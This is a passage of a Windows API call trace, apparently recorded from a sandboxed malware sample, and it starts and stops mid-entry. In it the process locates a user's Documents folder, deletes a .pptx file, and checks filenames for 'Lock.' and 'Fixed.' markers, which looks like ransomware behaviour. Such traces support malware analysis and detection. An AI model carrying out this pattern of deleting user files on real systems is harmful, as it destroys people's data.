lpsz="USERPROFILEDIR") returned 0xe [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0266.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0266.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.386] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0266.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0266.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e) returned 0x24f2068 [0266.388] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/XeFrXnKCfR10wVvY0.pptx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XeFrXnKCfR10wVvY0.pptx", lpFilePart=0x8bedfc*="XeFrXnKCfR10wVvY0.pptx") returned 0x3e [0266.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0266.388] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XeFrXnKCfR10wVvY0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xefrxnkcfr10wvvy0.pptx")) returned 0x20 [0266.388] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XeFrXnKCfR10wVvY0.pptx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d5280d0, ftCreationTime.dwHighDateTime=0x1d4e9af, ftLastAccessTime.dwLowDateTime=0x3af8fd50, ftLastAccessTime.dwHighDateTime=0x1d4e5b3, ftLastWriteTime.dwLowDateTime=0x3af8fd50, ftLastWriteTime.dwHighDateTime=0x1d4e5b3, nFileSizeHigh=0x0, nFileSizeLow=0x44ea, dwReserved0=0x1ee2, dwReserved1=0x4, cFileName="XeFrXnKCfR10wVvY0.pptx", cAlternateFileName="XEFRXN~1.PPT")) returned 0xaa59a0 [0266.388] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XeFrXnKCfR10wVvY0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xefrxnkcfr10wvvy0.pptx")) returned 1 [0266.390] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d5280d0, ftCreationTime.dwHighDateTime=0x1d4e9af, ftLastAccessTime.dwLowDateTime=0x3af8fd50, ftLastAccessTime.dwHighDateTime=0x1d4e5b3, ftLastWriteTime.dwLowDateTime=0x3af8fd50, ftLastWriteTime.dwHighDateTime=0x1d4e5b3, nFileSizeHigh=0x0, nFileSizeLow=0x44ea, dwReserved0=0x1ee2, dwReserved1=0x4, cFileName="XeFrXnKCfR10wVvY0.pptx", cAlternateFileName="XEFRXN~1.PPT")) returned 0 [0266.390] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0266.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.391] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0266.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0266.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0266.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0266.391] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0266.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0266.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.392] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0266.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0266.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0266.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0266.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0266.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0266.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0266.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0266.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0266.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e) returned 0x24f2068 [0266.394] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/XeFrXnKCfR10wVvY0.pptx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XeFrXnKCfR10wVvY0.pptx", lpFilePart=0x8bf658*="XeFrXnKCfR10wVvY0.pptx") returned 0x3e [0266.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0266.394] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XeFrXnKCfR10wVvY0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xefrxnkcfr10wvvy0.pptx")) returned 0xffffffff [0266.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.395] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0266.395] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.395] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0266.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0266.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0266.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0266.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZeVUVJRj4YhmoN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eVUVJRj4YhmoN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VUVJRj4YhmoN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UVJRj4YhmoN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VJRj4YhmoN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JRj4YhmoN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj4YhmoN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j4YhmoN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4YhmoN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YhmoN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hmoN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="moN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oN71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="71.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0266.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0266.397] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0266.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0266.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0266.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0266.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2c) returned 0x24b3538 [0266.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZeVUVJRj4YhmoN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eVUVJRj4YhmoN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VUVJRj4YhmoN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UVJRj4YhmoN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VJRj4YhmoN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JRj4YhmoN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj4YhmoN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j4YhmoN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4YhmoN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YhmoN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hmoN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="moN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.398] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oN71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="71.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.399] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3618 [0266.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3618 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: 